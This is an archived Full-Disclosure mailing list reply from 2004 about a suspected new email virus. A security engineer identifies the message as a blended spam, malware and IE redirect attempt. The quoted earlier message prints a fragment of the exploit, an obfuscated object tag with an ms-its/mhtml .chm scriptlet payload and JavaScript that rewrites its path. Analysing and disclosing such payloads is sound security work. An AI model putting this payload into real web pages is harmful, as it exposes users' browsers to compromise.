[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-Disclosure] new email virus?

To: morning_wood <se_cur_ity@xxxxxxxxxxx>
Subject: Re: [Full-Disclosure] new email virus?
From: Charles Heselton <charles.heselton@xxxxxxxxx>
Date: Wed, 25 Aug 2004 20:28:04 -0700

On Wed, 25 Aug 2004 13:50:04 -0700, morning_wood <se_cur_ity@xxxxxxxxxxx> wrote:
> ><object  data="http://www.v%69k%6F%72d.com/default.htm";><br><br>
> 
> this is a data tag .chm exploit
> 
> [textarea id="code" style="display:none;"]
>    [object
> data="&#109;s-its:%6D%68%74%6D%6C:file://C:\drqwtt.mht!${PATH}/default.chm::
> /default.htm" type="text/x-scriptlet"][/object]
> [/textarea]
> 
> [script language="javascript"]
> 
> document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,loca
> tion.href.indexOf('default.htm'))));
> [/script]
> 
> m.wood
> 
> 
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 


Yeah, looks like a blended spam/malware/IE Redirect type exploit
attempt.  If the recipient is dumb enough to click on the link they've
just opened themselves to something "interesting".  ;)

-- 
Charlie Heselton
Network Security Engineer

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Follow-Ups:
- Re: [Full-Disclosure] new email virus?
  - From: Nick FitzGerald

References:
- [Full-Disclosure] new email virus?
  - From: John Nagro
- Re: [Full-Disclosure] new email virus?
  - From: morning_wood

Prev by Date: Re: [Full-Disclosure] Automated ssh scanning
Next by Date: [Full-Disclosure] Alpha Phising [IE 6 WinXP SP2]
Previous by thread: Re: [Full-Disclosure] new email virus?
Next by thread: Re: [Full-Disclosure] new email virus?
Index(es):
- Date
- Thread